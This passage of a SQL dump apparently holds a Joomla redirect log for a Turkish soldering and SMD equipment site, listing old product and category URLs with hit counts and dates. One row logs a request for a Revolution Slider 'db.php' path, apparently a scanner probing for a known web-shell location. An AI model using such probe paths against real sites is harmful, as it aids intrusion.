00:00:00',301),(12241,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/dirdesc/results,1-10',NULL,'','',5,0,'2017-11-17 19:17:00','0000-00-00 00:00:00',301),(12242,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku',NULL,'','',1,0,'2017-11-17 19:20:39','0000-00-00 00:00:00',301),(12243,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/lfs-1-detail',NULL,'','',43,0,'2017-11-17 19:27:55','0000-00-00 00:00:00',301),(12244,'http://3s-technologies.com.tr/tr/urunler/screen-printer/by,mf_name',NULL,'','',20,0,'2017-11-17 19:37:54','0000-00-00 00:00:00',301),(12245,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-5',NULL,'','',4,0,'2017-11-17 19:42:27','0000-00-00 00:00:00',301),(12246,'http://3s-technologies.com.tr/index.php/en/products/275-k100-1.2mm-detail?print=1&tmpl=component',NULL,'','',2,0,'2017-11-17 20:00:07','0000-00-00 00:00:00',301),(12247,'http://3s-technologies.com.tr/tr/urunler/ess-310-24-detail?tmpl=component&print=1',NULL,'','',18,0,'2017-11-17 20:03:13','0000-00-00 00:00:00',301),(12248,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-17 20:21:08','0000-00-00 00:00:00',301),(12249,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/dirdesc/results,1-50',NULL,'','',7,0,'2017-11-17 20:29:44','0000-00-00 00:00:00',301),(12250,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc',NULL,'','',3,0,'2017-11-17 20:37:00','0000-00-00 00:00:00',301),(12251,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-5',NULL,'','',1,0,'2017-11-17 20:44:18','0000-00-00 00:00:00',301),(12252,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,category_name',NULL,'','',42,0,'2017-11-17 21:28:16','0000-00-00 00:00:00',301),(12253,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',1,0,'2017-11-17 21:35:11','0000-00-00 00:00:00',301),(12254,'http://3s-technologies.com.tr/index.php/en/products/manufacturers/ddm-novastar',NULL,'','',27,0,'2017-11-17 21:37:30','0000-00-00 00:00:00',301),(12255,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/dirdesc/results,1-10',NULL,'','',6,0,'2017-11-17 21:38:49','0000-00-00 00:00:00',301),(12256,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/le40v_400x214_250x250.jpg',NULL,'','',4,0,'2017-11-17 21:39:35','0000-00-00 00:00:00',301),(12257,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/rhii_640x420_250x250.jpg',NULL,'','',1,0,'2017-11-17 21:39:43','0000-00-00 00:00:00',301),(12258,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/avf-detail',NULL,'','',13,0,'2017-11-17 21:42:00','0000-00-00 00:00:00',301),(12259,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,ordering/results,1-5',NULL,'','',4,0,'2017-11-17 21:46:05','0000-00-00 00:00:00',301),(12260,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,ordering?language=en-gb',NULL,'','',2,0,'2017-11-17 21:48:49','0000-00-00 00:00:00',301),(12261,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-40',NULL,'','',3,0,'2017-11-17 21:49:43','0000-00-00 00:00:00',301),(12262,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,mf_name/results,1-5',NULL,'','',3,0,'2017-11-17 22:33:22','0000-00-00 00:00:00',301),(12263,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',5,0,'2017-11-17 22:37:00','0000-00-00 00:00:00',301),(12264,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim?language=en-gb',NULL,'','',25,0,'2017-11-17 23:01:36','0000-00-00 00:00:00',301),(12265,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc',NULL,'','',4,0,'2017-11-17 23:09:44','0000-00-00 00:00:00',301),(12266,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,mf_name/dirdesc/results,1-5',NULL,'','',5,0,'2017-11-18 00:00:00','0000-00-00 00:00:00',301),(12267,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-50',NULL,'','',5,0,'2017-11-18 00:04:34','0000-00-00 00:00:00',301),(12268,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-10',NULL,'','',3,0,'2017-11-18 00:11:32','0000-00-00 00:00:00',301),(12269,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering',NULL,'','',3,0,'2017-11-18 00:13:55','0000-00-00 00:00:00',301),(12270,'http://3s-technologies.com.tr/index.php/en/products/275-k100-1mm-detail?print=1&tmpl=component',NULL,'','',2,0,'2017-11-18 00:15:25','0000-00-00 00:00:00',301),(12271,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,mf_name',NULL,'','',397,0,'2017-11-18 00:17:47','0000-00-00 00:00:00',301),(12272,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,product_sku',NULL,'','',8,0,'2017-11-18 00:32:47','0000-00-00 00:00:00',301),(12273,'http://3s-technologies.com.tr/tr/urunler/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-18 00:36:54','0000-00-00 00:00:00',301),(12274,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku',NULL,'','',18,0,'2017-11-18 00:40:41','0000-00-00 00:00:00',301),(12275,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',398,0,'2017-11-18 00:47:43','0000-00-00 00:00:00',301),(12276,'http://3s-technologies.com.tr/en/products/thru-hole/rl132-detail',NULL,'','',26,0,'2017-11-18 00:50:19','0000-00-00 00:00:00',301),(12277,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by?language=en-gb&product_sku',NULL,'','',6,0,'2017-11-18 00:53:58','0000-00-00 00:00:00',301),(12278,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,product_name?language=tr-tr',NULL,'','',12,0,'2017-11-18 00:55:10','0000-00-00 00:00:00',301),(12279,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-20',NULL,'','',3,0,'2017-11-18 01:09:43','0000-00-00 00:00:00',301),(12280,'http://3s-technologies.com.tr/en/products/manufacturers/mirae?tmpl=component',NULL,'','',1,0,'2017-11-18 01:13:19','0000-00-00 00:00:00',301),(12281,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/dirdesc',NULL,'','',7,0,'2017-11-18 01:13:26','0000-00-00 00:00:00',301),(12282,'http://3s-technologies.com.tr/tr/urunler/screen-printer/by,category_name',NULL,'','',20,0,'2017-11-18 01:17:15','0000-00-00 00:00:00',301),(12283,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri',NULL,'','',19,0,'2017-11-18 01:31:32','0000-00-00 00:00:00',301),(12284,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,category_name/dirdesc?language=en-gb',NULL,'','',7,0,'2017-11-18 01:33:53','0000-00-00 00:00:00',301),(12285,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name/results,1-50',NULL,'','',5,0,'2017-11-18 01:38:49','0000-00-00 00:00:00',301),(12286,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/mirae-mx_400_s_250x250.gif',NULL,'','',1,0,'2017-11-18 01:46:33','0000-00-00 00:00:00',301),(12287,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-18 01:51:34','0000-00-00 00:00:00',301),(12288,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,category_name/dirdesc?language=tr-tr',NULL,'','',9,0,'2017-11-18 01:53:21','0000-00-00 00:00:00',301),(12289,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-10',NULL,'','',4,0,'2017-11-18 02:04:57','0000-00-00 00:00:00',301),(12290,'http://3s-technologies.com.tr/tr/urunler/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-18 02:09:54','0000-00-00 00:00:00',301),(12291,'http://3s-technologies.com.tr/index.php/en/products/e-bar-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-18 02:21:18','0000-00-00 00:00:00',301),(12292,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku',NULL,'','',4,0,'2017-11-18 02:26:04','0000-00-00 00:00:00',301),(12293,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,product_sku?language=en-gb',NULL,'','',8,0,'2017-11-18 02:36:46','0000-00-00 00:00:00',301),(12294,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,mf_name/results,1-20',NULL,'','',1,0,'2017-11-18 02:36:59','0000-00-00 00:00:00',301),(12295,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-50',NULL,'','',1,0,'2017-11-18 02:40:37','0000-00-00 00:00:00',301),(12296,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/results,1-5',NULL,'','',4,0,'2017-11-18 02:47:53','0000-00-00 00:00:00',301),(12297,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',392,0,'2017-11-18 02:49:09','0000-00-00 00:00:00',301),(12298,'http://3s-technologies.com.tr/index.php/en/products/ess-310-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-18 02:55:04','0000-00-00 00:00:00',301),(12299,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic',NULL,'','',4,0,'2017-11-18 02:55:10','0000-00-00 00:00:00',301),(12300,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-33-detail/askquestion?tmpl=component',NULL,'','',9,0,'2017-11-18 03:05:07','0000-00-00 00:00:00',301),(12301,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?language=en-gb&ordering',NULL,'','',3,0,'2017-11-18 03:05:26','0000-00-00 00:00:00',301),(12302,'http://3s-technologies.com.tr/index.php/en/products/av132-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-18 03:05:46','0000-00-00 00:00:00',301),(12303,'http://3s-technologies.com.tr/index.php/en/products/e-bar-detail?print=1&tmpl=component',NULL,'','',2,0,'2017-11-18 03:07:29','0000-00-00 00:00:00',301),(12304,'http://3s-technologies.com.tr/index.php/tr/hakk-m-zda',NULL,'','',26,0,'2017-11-18 03:20:37','0000-00-00 00:00:00',301),(12305,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,product_sku?language=tr-tr',NULL,'','',7,0,'2017-11-18 03:25:41','0000-00-00 00:00:00',301),(12306,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',7,0,'2017-11-18 03:27:53','0000-00-00 00:00:00',301),(12307,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/screen-printer/by,product_name',NULL,'','',5,0,'2017-11-18 03:35:10','0000-00-00 00:00:00',301),(12308,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc',NULL,'','',5,0,'2017-11-18 03:38:48','0000-00-00 00:00:00',301),(12309,'http://www.3s-technologies.com.tr/en/products/manufacturer/dalga-lehim/dirdesc',NULL,'','',2,0,'2017-11-18 03:38:59','0000-00-00 00:00:00',301),(12310,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,ordering/results,1-5',NULL,'','',1,0,'2017-11-18 03:42:26','0000-00-00 00:00:00',301),(12311,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku',NULL,'','',7,0,'2017-11-18 03:46:04','0000-00-00 00:00:00',301),(12312,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name',NULL,'','',5,0,'2017-11-18 03:56:36','0000-00-00 00:00:00',301),(12313,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim',NULL,'','',17,0,'2017-11-18 03:56:58','0000-00-00 00:00:00',301),(12314,'http://www.3s-technologies.com.tr/tr/urunler/manufacturers/kester',NULL,'','',23,0,'2017-11-18 04:03:12','0000-00-00 00:00:00',301),(12315,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-40',NULL,'','',4,0,'2017-11-18 04:11:31','0000-00-00 00:00:00',301),(12316,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',3,0,'2017-11-18 04:28:07','0000-00-00 00:00:00',301),(12317,'http://www.3s-technologies.com.tr/index.php/en/products/am100-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-18 04:30:39','0000-00-00 00:00:00',301),(12318,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-18 04:31:41','0000-00-00 00:00:00',301),(12319,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,ordering/results,1-20',NULL,'','',3,0,'2017-11-18 04:40:37','0000-00-00 00:00:00',301),(12320,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-10',NULL,'','',9,0,'2017-11-18 04:55:09','0000-00-00 00:00:00',301),(12321,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/results,1-10',NULL,'','',5,0,'2017-11-18 04:58:47','0000-00-00 00:00:00',301),(12322,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/results,1-20',NULL,'','',1,0,'2017-11-18 05:12:44','0000-00-00 00:00:00',301),(12323,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc',NULL,'','',5,0,'2017-11-18 05:27:53','0000-00-00 00:00:00',301),(12324,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/results,1-10',NULL,'','',8,0,'2017-11-18 05:28:05','0000-00-00 00:00:00',301),(12325,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,ordering/results,1-50',NULL,'','',1,0,'2017-11-18 05:42:26','0000-00-00 00:00:00',301),(12326,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-5',NULL,'','',4,0,'2017-11-18 06:07:53','0000-00-00 00:00:00',301),(12327,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',4,0,'2017-11-18 06:11:31','0000-00-00 00:00:00',301),(12328,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/results,1-10',NULL,'','',7,0,'2017-11-18 06:23:09','0000-00-00 00:00:00',301),(12329,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',387,0,'2017-11-18 06:35:43','0000-00-00 00:00:00',301),(12330,'http://3s-technologies.com.tr/index.php/en/products/avb-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-18 07:14:28','0000-00-00 00:00:00',301),(12331,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-18 07:19:22','0000-00-00 00:00:00',301),(12332,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-20',NULL,'','',4,0,'2017-11-18 07:21:11','0000-00-00 00:00:00',301),(12333,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/am100_150x150.jpg',NULL,'','',2,0,'2017-11-18 07:27:30','0000-00-00 00:00:00',301),(12334,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,ordering/results,1-10',NULL,'','',1,0,'2017-11-18 07:32:48','0000-00-00 00:00:00',301),(12335,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-18 07:39:03','0000-00-00 00:00:00',301),(12336,'http://3s-technologies.com.tr/en/products/screen-printer/by,category_name',NULL,'','',15,0,'2017-11-18 07:59:17','0000-00-00 00:00:00',301),(12337,'http://3s-technologies.com.tr/tr/urunler/thru-hole/dirdesc',NULL,'','',8,0,'2017-11-18 07:59:25','0000-00-00 00:00:00',301),(12338,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,product_sku?language=en-gb',NULL,'','',8,0,'2017-11-18 08:02:55','0000-00-00 00:00:00',301),(12339,'http://3s-technologies.com.tr/tr/urunler/konveyorler/by,category_name',NULL,'','',22,0,'2017-11-18 08:10:05','0000-00-00 00:00:00',301),(12340,'http://3s-technologies.com.tr/tr/urunler/spartan-8s-8d-44-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-18 08:15:41','0000-00-00 00:00:00',301),(12341,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/by,product_sku',NULL,'','',7,0,'2017-11-18 08:29:17','0000-00-00 00:00:00',301),(12342,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-18 08:39:16','0000-00-00 00:00:00',301),(12343,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hä±z/by,mf_name',NULL,'','',2,0,'2017-11-18 08:54:20','0000-00-00 00:00:00',301),(12344,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/ess-310-left-400x464_250x250.jpg',NULL,'','',1,0,'2017-11-18 09:00:19','0000-00-00 00:00:00',301),(12345,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-18 09:14:46','0000-00-00 00:00:00',301),(12346,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı',NULL,'','',347,0,'2017-11-18 09:40:32','0000-00-00 00:00:00',301),(12347,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/by,ordering',NULL,'','',6,0,'2017-11-18 09:52:09','0000-00-00 00:00:00',301),(12348,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/avb_1_250x250.jpg',NULL,'','',1,0,'2017-11-18 10:03:51','0000-00-00 00:00:00',301),(12349,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name',NULL,'','',2,0,'2017-11-18 10:17:57','0000-00-00 00:00:00',301),(12350,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız',NULL,'','',547,0,'2017-11-18 10:27:00','0000-00-00 00:00:00',301),(12351,'http://www.3s-technologies.com.tr/en/wp-content/plugins/revslider/temp/update_extract/revslider/db.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/revslider/temp/update_extract/revslider/db.php','',5,0,'2017-11-18 10:55:57','0000-00-00 00:00:00',301),(12352,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,category_name',NULL,'','',50,0,'2017-11-18 11:08:00','0000-00-00 00:00:00',301),(12353,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh6-detail',NULL,'','',38,0,'2017-11-18 11:34:13','0000-00-00 00:00:00',301),(12354,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/ess-310-left-400x464_250x250.jpg',NULL,'','',1,0,'2017-11-18 11:38:57','0000-00-00 00:00:00',301),(12355,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,category_name/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-11-18 11:42:57','0000-00-00 00:00:00',301),(12356,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,product_sku?language=en-gb',NULL,'','',8,0,'2017-11-18 12:35:29','0000-00-00 00:00:00',301),(12357,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-11-18 12:41:44','0000-00-00 00:00:00',301),(12358,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/home2/79-english-uk',NULL,'','',8,0,'2017-11-18 12:56:38','0000-00-00 00:00:00',301),(12359,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/dirdesc?language=tr-tr',NULL,'','',32,0,'2017-11-18 13:06:54','0000-00-00 00:00:00',301),(12360,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/by,pc.ordering,product_name',NULL,'','',3,0,'2017-11-18 13:09:34','0000-00-00 00:00:00',301),(12361,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/dirdesc',NULL,'','',35,0,'2017-11-18 13:19:52','0000-00-00 00:00:00',301),(12362,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,mf_name',NULL,'','',6,0,'2017-11-18 13:28:16','0000-00-00 00:00:00',301),(12363,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/spr-20_250x250.gif',NULL,'','',1,0,'2017-11-18 14:54:22','0000-00-00 00:00:00',301),(12364,'http://www.3s-technologies.com.tr/en/home2/79-english-uk',NULL,'','',31,0,'2017-11-18 15:03:46','0000-00-00 00:00:00',301),(12365,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,product_name',NULL,'','',38,0,'2017-11-18 15:22:39','0000-00-00 00:00:00',301),(12366,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/results,1-40',NULL,'','',3,0,'2017-11-18 15:38:07','0000-00-00 00:00:00',301),(12367,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/dirdesc/results,1-20',NULL,'','',9,0,'2017-11-18 16:08:51','0000-00-00 00:00:00',301),(12368,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',27,0,'2017-11-18 16:35:56','0000-00-00 00:00:00',301),(12369,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-18 16:39:39','0000-00-00 00:00:00',301),(12370,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,mf_name/results,1-10',NULL,'','',4,0,'2017-11-18 16:54:36','0000-00-00 00:00:00',301),(12371,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-detail',NULL,'','',52,0,'2017-11-18 17:22:47','0000-00-00 00:00:00',301),(12372,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/t_ly8c_250x250.jpg',NULL,'','',1,0,'2017-11-18 17:48:48','0000-00-00 00:00:00',301),(12373,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-18 18:05:37','0000-00-00 00:00:00',301),(12374,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,mf_name/results,1-50',NULL,'','',3,0,'2017-11-18 18:10:46','0000-00-00 00:00:00',301),(12375,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2017-11-18 19:06:38','0000-00-00 00:00:00',301),(12376,'http://www.3s-technologies.com.tr/en/products/thru-hole/',NULL,'http://www.3s-technologies.com.tr/en/products/thru-hole/','',3,0,'2017-11-18 19:18:48','0000-00-00 00:00:00',301),(12377,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,ordering/results,1-50?language=en-gb',NULL,'','',1,0,'2017-11-18 20:02:16','0000-00-00 00:00:00',301),(12378,'http://www.3s-technologies.com.tr/en/products/screen-printer/sp-18p-l-detail/askquestion?tmpl=component',NULL,'','',31,0,'2017-11-18 20:06:47','0000-00-00 00:00:00',301),(12379,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo',NULL,'','',4,0,'2017-11-18 20:17:26','0000-00-00 00:00:00',301),(12380,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-18 21:07:57','0000-00-00 00:00:00',301),(12381,'http://www.3s-technologies.com.tr/en/products/le-40v-detail?tmpl=component&print=1',NULL,'','',33,0,'2017-11-18 21:30:48','0000-00-00 00:00:00',301),(12382,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,product_name/results,1-20',NULL,'','',3,0,'2017-11-18 21:43:57','0000-00-00 00:00:00',301),(12383,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name',NULL,'','',40,0,'2017-11-18 21:45:45','0000-00-00 00:00:00',301),(12384,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',88,0,'2017-11-18 22:04:22','0000-00-00 00:00:00',301),(12385,'http://www.3s-technologies.com.tr/en/products/',NULL,'','',10,0,'2017-11-18 22:14:19','0000-00-00 00:00:00',301),(12386,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-40',NULL,'','',7,0,'2017-11-18 23:01:01','0000-00-00 00:00:00',301),(12387,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-10',NULL,'','',1,0,'2017-11-18 23:06:02','0000-00-00 00:00:00',301),(12388,'http://www.3s-technologies.com.tr/joomla/index.php?lang=tr',NULL,'','',111,0,'2017-11-18 23:08:24','0000-00-00 00:00:00',301),(12389,'http://www.3s-technologies.com.tr/tr/joomla/index.php?lang=tr',NULL,'','',1,0,'2017-11-18 23:08:28','0000-00-00 00:00:00',301),(12390,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering/results,1-10',NULL,'','',8,0,'2017-11-18 23:16:12','0000-00-00 00:00:00',301),(12391,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc',NULL,'','',3,0,'2017-11-18 23:21:22','0000-00-00 00:00:00',301),(12392,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-20',NULL,'','',4,0,'2017-11-18 23:21:25','0000-00-00 00:00:00',301),(12393,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo',NULL,'','',2,0,'2017-11-18 23:26:22','0000-00-00 00:00:00',301),(12394,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-100',NULL,'','',1,0,'2017-11-18 23:31:32','0000-00-00 00:00:00',301),(12395,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering/results,1-20',NULL,'','',4,0,'2017-11-18 23:31:33','0000-00-00 00:00:00',301),(12396,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-5',NULL,'','',2,0,'2017-11-18 23:36:42','0000-00-00 